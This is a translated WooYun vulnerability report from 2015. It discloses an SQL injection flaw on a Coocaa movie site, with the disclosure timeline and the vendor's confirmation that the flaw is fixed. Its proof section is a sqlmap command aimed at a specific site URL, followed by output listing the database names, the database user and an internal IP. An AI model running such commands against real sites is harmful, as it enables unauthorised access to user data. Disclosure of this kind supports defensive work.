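Vulnerability summary

Bug ID: wooyun-2015-090444

Title: SQL injection on a Coocaa site puts 100,000 users' information at risk

Vendor: Shenzhen Coocaa Network Technology Co., Ltd. (深圳市酷开网络科技有限公司)

Author: Forever80s

Submitted: 2015-01-07 16:23

Fixed: 2015-01-13 12:01

Disclosed: 2015-01-13 12:01

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Fixed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]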

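Vulnerability details

Disclosure status:

2015-01-07: Details reported to the vendor; awaiting vendor action
2015-01-08: Vendor confirmed; details disclosed to the vendor only
2015-01-13: Vendor fixed the vulnerability and chose to publish; details disclosed to the public

Brief description:

Detailed description:

Proof of vulnerability:

Fix: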

sqlmap -u "http://movie.coocaa.com/self/pl.php?id=3391750&classid=62"  --random-agent --dbs


[*] coocaa_web_new
[*] information_schema
[*] test



[*] 'web'@'192.168.0.52'

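Copyright notice: when reposting, please credit the source Forever80s@WooYun


Vendor response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2015-01-08 11:43

Vendor reply:

Thank you. We will fix it right away.

Latest status:

2015-01-13: Fixed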

